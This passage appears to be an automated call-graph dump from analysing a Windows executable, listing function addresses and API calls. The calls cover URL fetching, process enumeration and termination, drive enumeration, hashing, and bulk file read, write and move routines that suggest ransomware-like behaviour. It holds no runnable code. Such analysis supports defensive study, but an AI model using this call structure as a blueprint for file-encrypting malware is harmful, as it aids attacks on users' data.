39312 48514b 39313 48514f 39312->39313 39646 4924f7 TlsAlloc 39312->39646 39645 4851b7 61 API calls 2 library calls 39313->39645 39316 485154 39316->39277 39317 485161 39317->39313 39318 48516c 39317->39318 39319 488c96 __calloc_crt 58 API calls 39318->39319 39320 485179 39319->39320 39321 4851ae 39320->39321 39647 492553 TlsSetValue 39320->39647 39649 4851b7 61 API calls 2 library calls 39321->39649 39324 48518d 39324->39321 39326 485193 39324->39326 39325 4851b3 39325->39277 39648 48508e 58 API calls 4 library calls 39326->39648 39328 48519b GetCurrentThreadId 39328->39277 39330 488760 _fputws 39329->39330 39331 488af7 __lock 58 API calls 39330->39331 39332 488767 39331->39332 39333 488c96 __calloc_crt 58 API calls 39332->39333 39334 488778 39333->39334 39335 4887e3 GetStartupInfoW 39334->39335 39336 488783 _fputws @_EH4_CallFilterFunc@8 39334->39336 39342 4887f8 39335->39342 39343 488927 39335->39343 39336->39281 39337 4889ef 39652 4889ff LeaveCriticalSection _doexit 39337->39652 39339 488c96 __calloc_crt 58 API calls 39339->39342 39340 488974 GetStdHandle 39340->39343 39341 488987 GetFileType 39341->39343 39342->39339 39342->39343 39344 488846 39342->39344 39343->39337 39343->39340 39343->39341 39651 49263e InitializeCriticalSectionAndSpinCount 39343->39651 39344->39343 39345 48887a GetFileType 39344->39345 39650 49263e InitializeCriticalSectionAndSpinCount 39344->39650 39345->39344 39349 492370 39348->39349 39350 484034 39348->39350 39351 488cde __malloc_crt 58 API calls 39349->39351 39354 491f64 GetModuleFileNameW 39350->39354 39352 492396 ___check_float_string 39351->39352 39353 4923ac FreeEnvironmentStringsW 39352->39353 39353->39350 39355 491f98 _wparse_cmdline 39354->39355 39356 488cde __malloc_crt 58 API calls 39355->39356 39357 491fd8 _wparse_cmdline 39355->39357 39356->39357 39357->39288 39359 4921ba __W_Gettnames_l 39358->39359 39360 48404f 39358->39360 39361 488c96 __calloc_crt 58 API calls 39359->39361 39360->39293 39640 487c2e 58 API calls 3 library calls 39360->39640 39362 4921e3 __W_Gettnames_l 39361->39362 39362->39360 39364 49223a 39362->39364 39365 488c96 __calloc_crt 58 API calls 39362->39365 39366 49225f 39362->39366 39369 492276 39362->39369 39653 48962f 58 API calls _fputws 39362->39653 39363 480bed _free 58 API calls 39363->39360 39364->39363 39365->39362 39367 480bed _free 58 API calls 39366->39367 39367->39360 39654 4842fd 8 API calls 2 library calls 39369->39654 39371 492282 39373 487c74 __IsNonwritableInCurrentImage 39372->39373 39655 49aeb5 39373->39655 39375 487c92 __initterm_e 39376 4819ac __cinit 67 API calls 39375->39376 39377 487cb1 _doexit __IsNonwritableInCurrentImage 39375->39377 39376->39377 39377->39296 39379 479fa0 __write_nolock 39378->39379 39658 46cf10 39379->39658 39381 479fb0 39382 479fc4 GetCurrentProcess GetLastError SetPriorityClass 39381->39382 39383 479fb4 39381->39383 39384 479fe6 39382->39384 39385 479fe4 GetLastError 39382->39385 40031 4724e0 109 API calls _memset 39383->40031 39388 47d3c0 59 API calls 39384->39388 39385->39384 39387 479fb9 39387->39300 39389 47a00a 39388->39389 39390 47a022 39389->39390 39391 47b669 39389->39391 39395 47d340 59 API calls 39390->39395 39392 4af23e 59 API calls 39391->39392 39393 47b673 39392->39393 39394 4af23e 59 API calls 39393->39394 39396 47b67d 39394->39396 39397 47a04d 39395->39397 39397->39393 39398 47a065 39397->39398 39672 473a90 39398->39672 39402 47a159 GetCommandLineW CommandLineToArgvW lstrcpyW 39403 47a33d GlobalFree 39402->39403 39418 47a196 39402->39418 39404 47a354 39403->39404 39405 47a45c 39403->39405 39688 472220 39404->39688 39408 472220 76 API calls 39405->39408 39406 47a100 39406->39402 39409 47a359 39408->39409 39412 47a466 39409->39412 39703 46ef50 39409->39703 39410 47a1cc lstrcmpW lstrcmpW 39410->39418 39411 480235 60 API calls _LangCountryEnumProc@4 39411->39418 39412->39300 39414 47a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 39414->39418 39415 47a48f 39417 47a4ef 39415->39417 39708 473ea0 39415->39708 39420 471cd0 92 API calls 39417->39420 39418->39403 39418->39410 39418->39411 39418->39414 39419 47a361 39418->39419 40032 483c92 59 API calls ___get_qualified_locale_downlevel 39419->40032 39422 47a563 39420->39422 39425 474690 59 API calls 39422->39425 39456 47a5db 39422->39456 39423 47a36e lstrcpyW lstrcpyW 39424 47a395 OpenProcess 39423->39424 39426 47a402 39424->39426 39427 47a3a9 WaitForSingleObject CloseHandle 39424->39427 39429 47a5a9 39425->39429 39430 471cd0 92 API calls 39426->39430 39427->39426 39432 47a3cb 39427->39432 39428 47a6f9 40038 471a10 8 API calls 39428->40038 39434 474690 59 API calls 39429->39434 39435 47a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 39430->39435 39445 47a3d4 Sleep 39432->39445 39446 47a3e2 GlobalFree 39432->39446 40033 471ab0 PeekMessageW 39432->40033 39433 47a6fe 39436 47a8b6 CreateMutexA 39433->39436 39437 47a70f 39433->39437 39441 47a5d4 39434->39441 39442 47a451 39435->39442 39444 47a8ca 39436->39444 39443 47a7d0 39437->39443 39454 46ef50 58 API calls 39437->39454 39439 47a618 39439->39436 39440 47a624 GetVersion 39439->39440 39440->39428 39447 47a632 lstrcpyW lstrcatW lstrcatW 39440->39447 39729 46d240 CoInitialize 39441->39729 39442->39300 39448 46ef50 58 API calls 39443->39448 39450 46ef50 58 API calls 39444->39450 39445->39424 39451 47a3f7 39446->39451 39452 47a674 _memset 39447->39452 39453 47a7ec 39448->39453 39459 47a8da 39450->39459 39451->39300 39457 47a6b4 ShellExecuteExW 39452->39457 39455 47a7f1 lstrlenA 39453->39455 39462 47a72f 39454->39462 39458 480c62 _malloc 58 API calls 39455->39458 39456->39428 39456->39433 39456->39439 39457->39433 39461 47a6e3 39457->39461 39460 47a810 _memset 39458->39460 39463 473ea0 59 API calls 39459->39463 39474 47a92f 39459->39474 39465 47a81e MultiByteToWideChar lstrcatW 39460->39465 39604 47a9d1 39461->39604 39464 473ea0 59 API calls 39462->39464 39467 47a780 39462->39467 39463->39459 39464->39462 39465->39455 39466 47a847 lstrlenW 39465->39466 39468 47a856 39466->39468 39469 47a8a0 CreateMutexA 39466->39469 39470 47a79c CreateThread 39467->39470 39472 473ff0 59 API calls 39467->39472 39811 46e760 39468->39811 39469->39444 39470->39443 41357 47dbd0 39470->41357 39472->39470 39473 47a860 CreateThread WaitForSingleObject 39473->39469 41402 47e690 39473->41402 39475 475c10 59 API calls 39474->39475 39476 47a98c 39475->39476 39822 472840 39476->39822 39478 47a997 39827 470fc0 CryptAcquireContextW 39478->39827 39480 47a9ab 39481 47a9c2 lstrlenA 39480->39481 39482 47a9d8 39481->39482 39481->39604 39483 475c10 59 API calls 39482->39483 39484 47aa23 39483->39484 39485 472840 60 API calls 39484->39485 39486 47aa2e lstrcpyA 39485->39486 39489 47aa4b 39486->39489 39488 475c10 59 API calls 39490 47aa90 39488->39490 39489->39488 39491 46ef50 58 API calls 39490->39491 39492 47aaa0 39491->39492 39493 473ea0 59 API calls 39492->39493 39494 47aaf5 39492->39494 39493->39492 39495 473ff0 59 API calls 39494->39495 39496 47ab1d 39495->39496 39850 472900 39496->39850 39498 46ef50 58 API calls 39500 47abc5 39498->39500 39499 47ab28 _memmove 39499->39498 39501 473ea0 59 API calls 39500->39501 39502 47ac1e 39500->39502 39501->39500 39503 473ff0 59 API calls 39502->39503 39504 47ac46 39503->39504 39505 472900 60 API calls 39504->39505 39507 47ac51 _memmove 39505->39507 39506 46ef50 58 API calls 39508 47acee 39506->39508 39507->39506 39509 473ea0 59 API calls 39508->39509 39510 47ad43 39508->39510 39509->39508 39511 473ff0 59 API calls 39510->39511 39512 47ad6b 39511->39512 39513 472900 60 API calls 39512->39513 39516 47ad76 _memmove 39513->39516 39514 475c10 59 API calls 39515 47ae2a 39514->39515 39855 473580 39515->39855 39516->39514 39518 47ae3c 39519 475c10 59 API calls 39518->39519 39520 47ae76 39519->39520 39521 473580 59 API calls 39520->39521 39522 47ae82 39521->39522 39523 475c10 59 API calls 39522->39523 39524 47aebc 39523->39524 39525 473580 59 API calls 39524->39525 39526 47aec8 39525->39526 39527 475c10 59 API calls 39526->39527 39528 47af02 39527->39528 39529 473580 59 API calls 39528->39529 39530 47af0e 39529->39530 39531 475c10 59 API calls 39530->39531 39532 47af48 39531->39532 39533 473580 59 API calls 39532->39533 39534 47af54 39533->39534 39535 475c10 59 API calls 39534->39535 39536 47af8e 39535->39536 39537 473580 59 API calls 39536->39537 39538 47af9a 39537->39538 39539 475c10 59 API calls 39538->39539 39540 47afd4 39539->39540 39541 473580 59 API calls 39540->39541 39542 47afe0 39541->39542 39543 473100 59 API calls 39542->39543 39544 47b001 39543->39544 39545 473580 59 API calls 39544->39545 39546 47b025 39545->39546 39547 473100 59 API calls 39546->39547 39548 47b03c 39547->39548 39549 473580 59 API calls 39548->39549 39550 47b059 39549->39550 39551 473100 59 API calls 39550->39551 39552 47b070 39551->39552 39553 473580 59 API calls 39552->39553 39554 47b07c 39553->39554 39555 473100 59 API calls 39554->39555 39556 47b093 39555->39556 39557 473580 59 API calls 39556->39557 39558 47b09f 39557->39558 39559 473100 59 API calls 39558->39559 39560 47b0b6 39559->39560 39561 473580 59 API calls 39560->39561 39562 47b0c2 39561->39562 39563 473100 59 API calls 39562->39563 39564 47b0d9 39563->39564 39565 473580 59 API calls 39564->39565 39566 47b0e5 39565->39566 39567 473100 59 API calls 39566->39567 39568 47b0fc 39567->39568 39569 473580 59 API calls 39568->39569 39570 47b108 39569->39570 39572 47b130 39570->39572 40039 47cdd0 59 API calls 39570->40039 39573 46ef50 58 API calls 39572->39573 39574 47b16e 39573->39574 39576 47b1a5 GetUserNameW 39574->39576 39862 472de0 39574->39862 39577 47b1c9 39576->39577 39869 472c40 39577->39869 39579 47b1d8 39876 472bf0 39579->39876 39583 47b2f5 39887 4736c0 39583->39887 39587 47b311 39903 4730b0 39587->39903 39589 472c40 59 API calls 39605 47b1f3 39589->39605 39592 472900 60 API calls 39592->39605 39593 47b327 39930 4711c0 CreateFileW 39593->39930 39594 473580 59 API calls 39594->39605 39596 47b33b 40015 47ba10 LoadCursorW RegisterClassExW 39596->40015 39598 473100 59 API calls 39598->39605 39599 47b343 40016 47ba80 CreateWindowExW 39599->40016 39601 47b34b 39601->39604 40019 470a50 GetLogicalDrives 39601->40019 39604->39300 39605->39583 39605->39589 39605->39592 39605->39594 39605->39598 40040 46f1f0 59 API calls 39605->40040 39606 47b379 39607 473100 59 API calls 39606->39607 39608 47b3a5 39607->39608 39609 473580 59 API calls 39608->39609 39632 47b3b3 39609->39632 39610 47b48b 40030 47fdc0 CreateThread 39610->40030 39612 47b49f GetMessageW 39613 47b4bf 39612->39613 39614 47b4ed 39612->39614 39615 47b4c5 TranslateMessage DispatchMessageW KiUserCallbackDispatcher 39613->39615 39617 47b502 PostThreadMessageW 39614->39617 39618 47b55b 39614->39618 39615->39614 39615->39615 39616 47c330 59 API calls 39616->39632 39621 47b510 PeekMessageW 39617->39621 39619 47b564 PostThreadMessageW 39618->39619 39620 47b5bb 39618->39620 39622 47b570 PeekMessageW 39619->39622 39620->39604 39627 47b5d2 CloseHandle 39620->39627 39623 47b546 WaitForSingleObject 39621->39623 39624 47b526 DispatchMessageW PeekMessageW 39621->39624 39625 47b5a6 WaitForSingleObject 39622->39625 39626 47b586 DispatchMessageW PeekMessageW 39622->39626 39623->39618 39623->39621 39624->39623 39624->39624 39625->39620 39625->39622 39626->39625 39626->39626 39627->39604 39628 47c240 59 API calls 39628->39632 39629 47b8b0 59 API calls 39629->39632 39630 473260 59 API calls 39630->39632 39632->39610 39632->39616 39632->39628 39632->39629 39632->39630 40029 47fa10 CreateThread 39632->40029 41606 487e0e 39633->41606 39635 487f4c 39635->39301 39636->39274 39637->39278 39638->39286 39642->39304 39643->39310 39644->39312 39645->39316 39646->39317 39647->39324 39648->39328 39649->39325 39650->39344 39651->39343 39652->39336 39653->39362 39654->39371 39656 49aeb8 EncodePointer 39655->39656 39656->39656 39657 49aed2 39656->39657 39657->39375 39659 46cf32 _memset __write_nolock 39658->39659 39660 46cf4f InternetOpenW 39659->39660 39661 475c10 59 API calls 39660->39661 39662 46cf8a InternetOpenUrlW 39661->39662 39663 46cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 39662->39663 39671 46cfb2 39662->39671 39664 4756d0 59 API calls 39663->39664 39665 46d000 39664->39665 39666 4756d0 59 API calls 39665->39666 39667 46d049 39666->39667 39667->39671 40041 473010 59 API calls 39667->40041 39669 46d084 39669->39671 40042 473010 59 API calls 39669->40042 39671->39381 39673 473ab2 39672->39673 39679 473ad0 GetModuleFileNameW PathRemoveFileSpecW 39672->39679 39674 473b00 39673->39674 39675 473aba 39673->39675 39677 4af23e 59 API calls 39674->39677 39676 483b4c 59 API calls 39675->39676 39678 473ac7 39676->39678 39677->39678 39678->39679 40043 4af1bb 59 API calls 3 library calls 39678->40043 39682 478400 39679->39682 39683 478437 39682->39683 39687 478446 39682->39687 39683->39687 40044 475d50 59 API calls ___check_float_string 39683->40044 39684 4784b9 39684->39406 39687->39684 40045 478d50 59 API calls 39687->40045 39689 48f7c0 __write_nolock 39688->39689 39690 47222d 7 API calls 39689->39690 39691 4722bd K32EnumProcesses 39690->39691 39692 47228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 39690->39692 39693 4722d3 39691->39693 39695 4722df 39691->39695 39692->39691 39693->39409 39694 472353 39694->39409 39695->39694 39696 4722f0 OpenProcess 39695->39696 39697 472346 CloseHandle 39696->39697 39698 47230a K32EnumProcessModules 39696->39698 39697->39694 39697->39696 39698->39697 39699 47231c K32GetModuleBaseNameW 39698->39699 40046 480235 39699->40046 39701 47233e 39701->39697 39702 472345 39701->39702 39702->39697 39704 480c62 _malloc 58 API calls 39703->39704 39707 46ef6e _memset 39704->39707 39705 46efdc 39705->39415 39706 480c62 _malloc 58 API calls 39706->39707 39707->39705 39707->39706 39709 473f05 39708->39709 39715 473eae 39708->39715 39710 473fb1 39709->39710 39711 473f18 39709->39711 39712 4af23e 59 API calls 39710->39712 39713 473f2d 39711->39713 39714 473fbb 39711->39714 39721 473f3d ___check_float_string 39711->39721 39712->39714 39717 476760 59 API calls 39713->39717 39713->39721 39716 4af23e 59 API calls 39714->39716 39715->39709 39719 473ed4 39715->39719 39718 473fc5 39716->39718 39717->39721 39720 473ff0 59 API calls 39718->39720 39722 473eef 39719->39722 39723 473ed9 39719->39723 39724 473fdf 39720->39724 39721->39415 40059 473da0 59 API calls ___check_float_string 39722->40059 40058 473da0 59 API calls ___check_float_string 39723->40058 39724->39415 39727 473eff 39727->39415 39728 473ee9 39728->39415 39730 46d27d CoInitializeSecurity 39729->39730 39736 46d276 39729->39736 39731 474690 59 API calls 39730->39731 39732 46d2b8 CoCreateInstance 39731->39732 39733 46d2e3 VariantInit VariantInit VariantInit VariantInit 39732->39733 39734 46da3c CoUninitialize 39732->39734 39735 46d38e VariantClear VariantClear VariantClear VariantClear 39733->39735 39734->39736 39737 46d3e2 39735->39737 39738 46d3cc CoUninitialize 39735->39738 39736->39456 40060 46b140 39737->40060 39738->39736 39741 46d3f6 40065 46b1d0 39741->40065 39743 46d422 39744 46d426 CoUninitialize 39743->39744 39745 46d43c 39743->39745 39744->39736 39746 46b140 60 API calls 39745->39746 39748 46d449 39746->39748 39749 46b1d0 SysFreeString 39748->39749 39750 46d471 39749->39750 39751 46d496 CoUninitialize 39750->39751 39753 46d4ac 39750->39753 39751->39736 39754 46b140 60 API calls 39753->39754 39796 46d8cf 39753->39796 39755 46d4d5 39754->39755 39756 46b1d0 SysFreeString 39755->39756 39757 46d4fd 39756->39757 39758 46b140 60 API calls 39757->39758 39757->39796 39759 46d5ae 39758->39759 39760 46b1d0 SysFreeString 39759->39760 39761 46d5d6 39760->39761 39762 46b140 60 API calls 39761->39762 39761->39796 39763 46d679 39762->39763 39764 46b1d0 SysFreeString 39763->39764 39765 46d6a1 39764->39765 39766 46b140 60 API calls 39765->39766 39765->39796 39767 46d6b6 39766->39767 39768 46b1d0 SysFreeString 39767->39768 39769 46d6de 39768->39769 39770 46b140 60 API calls 39769->39770 39769->39796 39771 46d707 39770->39771 39772 46b1d0 SysFreeString 39771->39772 39773 46d72f 39772->39773 39774 46b140 60 API calls 39773->39774 39773->39796 39775 46d744 39774->39775 39776 46b1d0 SysFreeString 39775->39776 39777 46d76c 39776->39777 39777->39796 40069 483aaf GetSystemTimeAsFileTime 39777->40069 39779 46d77d 40071 483551 39779->40071 39784 472c40 59 API calls 39785 46d7b5 39784->39785 39786 472900 60 API calls 39785->39786 39787 46d7c3 39786->39787 39788 46b140 60 API calls 39787->39788 39789 46d7db 39788->39789 39790 46b1d0 SysFreeString 39789->39790 39791 46d7ff 39790->39791 39792 46b140 60 API calls 39791->39792 39791->39796 39793 46d8a3 39792->39793 39794 46b1d0 SysFreeString 39793->39794 39795 46d8cb 39794->39795 39795->39796 39797 46b140 60 API calls 39795->39797 39796->39734 39798 46d8ea 39797->39798 39799 46b1d0 SysFreeString 39798->39799 39800 46d912 39799->39800 39800->39796 40079 46b400 SysAllocString 39800->40079 39802 46d936 VariantInit VariantInit 39803 46b140 60 API calls 39802->39803 39804 46d985 39803->39804 39805 46b1d0 SysFreeString 39804->39805 39806 46d9e7 VariantClear VariantClear VariantClear 39805->39806 39807 46da46 CoUninitialize 39806->39807 39808 46da10 39806->39808 39807->39736 40083 48052a 78 API calls swprintf 39808->40083 40234 46e670 39811->40234 39813 473ea0 59 API calls 39815 46e7c3 39813->39815 39814 46e79e 39814->39813 39816 473ff0 59 API calls 39815->39816 39817 46e7ff 39816->39817 40260 46e870 39817->40260 39819 46e806 39820 473ff0 59 API calls 39819->39820 39821 46e80d 39819->39821 39820->39821 39821->39473 40512 473c40 39822->40512 39824 47288c WideCharToMultiByte 40522 4784e0 39824->40522 39826 4728cf 39826->39478 39828 47102b CryptCreateHash 39827->39828 39829 47101a 39827->39829 39831 471056 lstrlenA CryptHashData 39828->39831 39832 471045 39828->39832 40538 490eca RaiseException 39829->40538 39834 47107f CryptGetHashParam 39831->39834 39835 47106e 39831->39835 40539 490eca RaiseException 39832->40539 39837 47109f 39834->39837 39839 4710b0 _memset 39834->39839 40540 490eca RaiseException 39835->40540 40541 490eca RaiseException 39837->40541 39840 4710cf CryptGetHashParam 39839->39840 39841 4710f5 39840->39841 39842 4710e4 39840->39842 39844 480c62 _malloc 58 API calls 39841->39844 40542 490eca RaiseException 39842->40542 39845 471105 _memset 39844->39845 39846 471148 39845->39846 39847 4804a6 _sprintf 83 API calls 39845->39847 39848 47114e CryptDestroyHash CryptReleaseContext 39846->39848 39849 471133 lstrcatA 39847->39849 39848->39480 39849->39845 39849->39846 39851 473a90 59 API calls 39850->39851 39852 47294c MultiByteToWideChar 39851->39852 39853 478400 59 API calls 39852->39853 39854 47298d 39853->39854 39854->39499 39856 4735d6 39855->39856 39857 473591 39855->39857 39861 4735b7 39856->39861 40544 474f70 59 API calls 39856->40544 39857->39856 39859 473597 39857->39859 39859->39861 40543 474f70 59 API calls 39859->40543 39861->39518 39863 472dec 39862->39863 39864 472dfa 39862->39864 39865 473ea0 59 API calls 39863->39865 39867 473ea0 59 API calls 39864->39867 39866 472df5 39865->39866 39866->39574 39868 472e11 39867->39868 39868->39574 39870 472c71 39869->39870 39871 472c5f 39869->39871 39874 4756d0 59 API calls 39870->39874 39872 4756d0 59 API calls 39871->39872 39873 472c6a 39872->39873 39873->39579 39875 472c8a 39874->39875 39875->39579 39877 473ff0 59 API calls 39876->39877 39878 472c13 39877->39878 39879 46ecb0 39878->39879 39880 46ece5 39879->39880 39882 46eefc 39880->39882 40545 481b3b 59 API calls 3 library calls 39880->40545 39882->39605 39883 4756d0 59 API calls 39884 46ed6b _memmove 39883->39884 39884->39882 39884->39883 39885 475230 59 API calls 39884->39885 40546 481b3b 59 API calls 3 library calls 39884->40546 39885->39884 39888 4736e7 39887->39888 39889 473742 39887->39889 39888->39889 39890 4736ed 39888->39890 39893 47370d 39889->39893 40548 474f70 59 API calls 39889->40548 39890->39893 40547 474f70 59 API calls 39890->40547 39892 47377f 39896 46ca70 39892->39896 39893->39892 39895 474690 59 API calls 39893->39895 39895->39892 39897 46caa3 39896->39897 39901 46cb64 39896->39901 39898 46cb6b 39897->39898 39897->39901 39902 4736c0 59 API calls 39897->39902 40549 4af26c 59 API calls 3 library calls 39898->40549 39900 46cb75 39900->39587 39901->39587 39902->39897 39904 474690 59 API calls 39903->39904 39905 4730d4 39904->39905 39906 46c740 39905->39906 40550 480fdd 39906->40550 39909 46c944 CreateDirectoryW 39911 480fdd 115 API calls 39909->39911 39912 46c960 39911->39912 39920 46c96a 39912->39920 39926 46c9d5 39912->39926 40574 4828fd 82 API calls 4 library calls 39912->40574 39913 46c90e 39913->39909 39913->39920 39914 46c906 40573 483a38 83 API calls 4 library calls 39914->40573 39918 46c9ed 40576 4828fd 82 API calls 4 library calls 39918->40576 39919 480546 58 API calls 39929 46c79e _memmove 39919->39929 39920->39593 39923 46c9f8 40577 483a38 83 API calls 4 library calls 39923->40577 39924 475c10 59 API calls 39924->39929 40575 4828fd 82 API calls 4 library calls 39926->40575 39927 46c9fe 39927->39920 39928 474f70 59 API calls 39928->39929 39929->39914 39929->39919 39929->39924 39929->39928 40560 481101 39929->40560 39931 471223 GetFileSizeEx 39930->39931 39932 471287 39930->39932 39933 471234 39931->39933 39934 4712a3 VirtualAlloc 39931->39934 39932->39596 39933->39934 39936 47123c CloseHandle 39933->39936 39935 47131a CloseHandle 39934->39935 39941 4712c0 _memset 39934->39941 39935->39596 39937 473100 59 API calls 39936->39937 39938 471253 39937->39938 40972 4759d0 39938->40972 39940 4713a7 39942 4713b7 SetFilePointer 39940->39942 39941->39940 39944 4712e9 SetFilePointerEx 39941->39944 39945 4713f5 ReadFile 39942->39945 40010 4715ae 39942->40010 39943 47126a MoveFileW 39943->39932 39946 471332 ReadFile 39944->39946 39947 47130c VirtualFree 39944->39947 39948 47140f VirtualFree CloseHandle 39945->39948 39953 471440 39945->39953 39946->39947 39949 47134f 39946->39949 39947->39935 39951 47142f 39948->39951 39949->39947 39952 471356 39949->39952 39950 4715c5 SetFilePointerEx 39950->39948 39954 4715df 39950->39954 39951->39596 39952->39942 39959 472c40 59 API calls 39952->39959 39955 471471 lstrlenA 39953->39955 39956 471718 lstrlenA 39953->39956 39953->40010 39957 4715ed WriteFile 39954->39957 39961 471602 39954->39961 40998 480be4 39955->40998 41050 480be4 39956->41050 39957->39948 39957->39961 39964 471364 39959->39964 39962 4730b0 59 API calls 39961->39962 39966 471631 39962->39966 39964->39940 39975 471379 VirtualFree CloseHandle 39964->39975 39969 472840 60 API calls 39966->39969 39972 47163c WriteFile 39969->39972 39977 471658 39972->39977 39978 471396 39975->39978 39977->39948 39980 471660 lstrlenA WriteFile 39977->39980 39978->39596 39980->39948 39982 471686 CloseHandle 39980->39982 39983 473100 59 API calls 39982->39983 39984 4716a3 39983->39984 39985 4759d0 59 API calls 39984->39985 39987 4716be MoveFileW 39985->39987 39989 4716e4 VirtualFree 39987->39989 39993 4718a7 39987->39993 39994 4716fc 39989->39994 39997 4718d5 VirtualFree 39993->39997 39998 4718e3 39993->39998 39994->39596 39997->39998 39998->39932 40001 4718e8 CloseHandle 39998->40001 40001->39932 40010->39950 40015->39599 40017 47babb ShowWindow UpdateWindow 40016->40017 40018 47bab9 40016->40018 40017->39601 40018->39601 40022 470a81 40019->40022 40020 4756d0 59 API calls 40020->40022 40021 470bb4 40021->39606 40022->40020 40022->40021 40023 473ea0 59 API calls 40022->40023 40026 473ff0 59 API calls 40022->40026 40027 472900 60 API calls 40022->40027 40028 473580 59 API calls 40022->40028 40024 470ae0 SetErrorMode PathFileExistsA SetErrorMode 40023->40024 40024->40022 40025 470b0c GetDriveTypeA 40024->40025 40025->40022 40026->40022 40027->40022 40028->40022 40029->39632 41139 47f130 timeGetTime 40029->41139 40030->39612 41344 47fd80 40030->41344 40031->39387 40032->39423 40034 471af4 40033->40034 40035 471ad0 40033->40035 40034->39432 40036 471afc 40035->40036 40037 471adc DispatchMessageW PeekMessageW 40035->40037 40036->39432 40037->40034 40037->40035 40038->39433 40039->39572 40040->39605 40041->39669 40042->39671 40044->39687 40045->39687 40047 480241 40046->40047 40048 4802b6 40046->40048 40050 485208 _fputws 58 API calls 40047->40050 40054 480266 40047->40054 40057 4802c8 60 API calls 3 library calls 40048->40057 40052 48024d 40050->40052 40051 4802c3 40051->39701 40056 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40052->40056 40054->39701 40055 480258 40055->39701 40056->40055 40057->40051 40058->39728 40059->39727 40061 483b4c 59 API calls 40060->40061 40062 46b164 40061->40062 40063 46b177 SysAllocString 40062->40063 40064 46b194 40062->40064 40063->40064 40064->39741 40066 46b1de 40065->40066 40068 46b202 40065->40068 40067 46b1f5 SysFreeString 40066->40067 40066->40068 40067->40068 40068->39743 40070 483add __aulldiv 40069->40070 40070->39779 40084 49035d 40071->40084 40073 48355a 40074 46d78f 40073->40074 40092 483576 40073->40092 40076 4828e0 40074->40076 40187 48279f 40076->40187 40080 46b423 40079->40080 40081 46b41d 40079->40081 40082 46b42d VariantClear 40080->40082 40081->39802 40082->39802 40083->39796 40085 48501f __getptd_noexit 58 API calls 40084->40085 40086 490363 40085->40086 40087 490369 40086->40087 40088 49038d 40086->40088 40090 488cde __malloc_crt 58 API calls 40086->40090 40087->40088 40089 485208 _fputws 58 API calls 40087->40089 40088->40073 40091 49036e 40089->40091 40090->40087 40091->40073 40093 4835a9 _memset 40092->40093 40094 483591 40092->40094 40093->40094 40101 4835c0 40093->40101 40095 485208 _fputws 58 API calls 40094->40095 40096 483596 40095->40096 40133 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40096->40133 40098 4835cb 40100 485208 _fputws 58 API calls 40098->40100 40099 4835e9 40125 48fb64 40099->40125 40124 4835a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 40100->40124 40101->40098 40101->40099 40103 4835ee 40134 48f803 58 API calls _fputws 40103->40134 40105 4835f7 40106 4837e5 40105->40106 40135 48f82d 58 API calls _fputws 40105->40135 40148 4842fd 8 API calls 2 library calls 40106->40148 40109 483609 40109->40106 40136 48f857 40109->40136 40110 4837ef 40112 48361b 40112->40106 40113 483624 40112->40113 40114 48369b 40113->40114 40116 483637 40113->40116 40146 48f939 58 API calls 4 library calls 40114->40146 40143 48f939 58 API calls 4 library calls 40116->40143 40117 4836a2 40117->40124 40147 48fbb4 58 API calls 4 library calls 40117->40147 40120 48364f 40120->40124 40144 48fbb4 58 API calls 4 library calls 40120->40144 40122 483668 40122->40124 40145 48f939 58 API calls 4 library calls 40122->40145 40124->40074 40126 48fb70 _fputws 40125->40126 40127 488af7 __lock 58 API calls 40126->40127 40128 48fba5 _fputws 40126->40128 40129 48fb80 40127->40129 40128->40103 40130 48fb93 40129->40130 40149 48fe47 40129->40149 40178 48fbab LeaveCriticalSection _doexit 40130->40178 40133->40124 40134->40105 40135->40109 40137 48f861 40136->40137 40138 48f876 40136->40138 40139 485208 _fputws 58 API calls 40137->40139 40138->40112 40140 48f866 40139->40140 40186 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40140->40186 40142 48f871 40142->40112 40143->40120 40144->40122 40145->40124 40146->40117 40147->40124 40148->40110 40150 48fe53 _fputws 40149->40150 40151 488af7 __lock 58 API calls 40150->40151 40152 48fe71 _W_expandtime 40151->40152 40153 48f857 __tzset_nolock 58 API calls 40152->40153 40154 48fe86 40153->40154 40177 48ff25 __tzset_nolock 40154->40177 40179 48f803 58 API calls _fputws 40154->40179 40157 48fe98 40157->40177 40180 48f82d 58 API calls _fputws 40157->40180 40158 48ff71 GetTimeZoneInformation 40158->40177 40159 480bed _free 58 API calls 40159->40177 40161 48feaa 40161->40177 40181 493f99 58 API calls 2 library calls 40161->40181 40163 48ffd8 WideCharToMultiByte 40163->40177 40164 48feb8 40182 4a1667 78 API calls 3 library calls 40164->40182 40165 490010 WideCharToMultiByte 40165->40177 40168 48ff0c _strlen 40170 488cde __malloc_crt 58 API calls 40168->40170 40169 49ff8e 58 API calls __tzset_nolock 40169->40177 40173 48ff1a _strlen 40170->40173 40171 48fed9 type_info::operator== 40171->40168 40172 480bed _free 58 API calls 40171->40172 40171->40177 40172->40168 40173->40177 40183 48c0fd 58 API calls _fputws 40173->40183 40175 483c2d 61 API calls UnDecorator::getTemplateArgumentList 40175->40177 40176 490157 __tzset_nolock _fputws 40176->40130 40177->40158 40177->40159 40177->40163 40177->40165 40177->40169 40177->40175 40177->40176 40184 4842fd 8 API calls 2 library calls 40177->40184 40185 4900d7 LeaveCriticalSection _doexit 40177->40185 40178->40128 40179->40157 40180->40161 40181->40164 40182->40171 40183->40177 40184->40177 40185->40177 40186->40142 40214 48019c 40187->40214 40190 4827d4 40191 485208 _fputws 58 API calls 40190->40191 40192 4827d9 40191->40192 40222 4842d2 9 API calls __invalid_parameter_noinfo_noreturn 40192->40222 40193 4827e9 MultiByteToWideChar 40195 482804 GetLastError 40193->40195 40196 482815 40193->40196 40223 4851e7 58 API calls 3 library calls 40195->40223 40198 488cde __malloc_crt 58 API calls 40196->40198 40200 48281d 40198->40200 40199 482810 40203 480bed _free 58 API calls 40199->40203 40200->40199 40202 482825 MultiByteToWideChar 40200->40202 40201 46d7a3 40201->39784 40202->40195 40204 48283f 40202->40204 40205 4828a0 40203->40205 40206 488cde __malloc_crt 58 API calls 40204->40206 40207 480bed _free 58 API calls 40205->40207 40208 48284a 40206->40208 40207->40201 40208->40199 40224 48d51e 88 API calls 3 library calls 40208->40224 40210 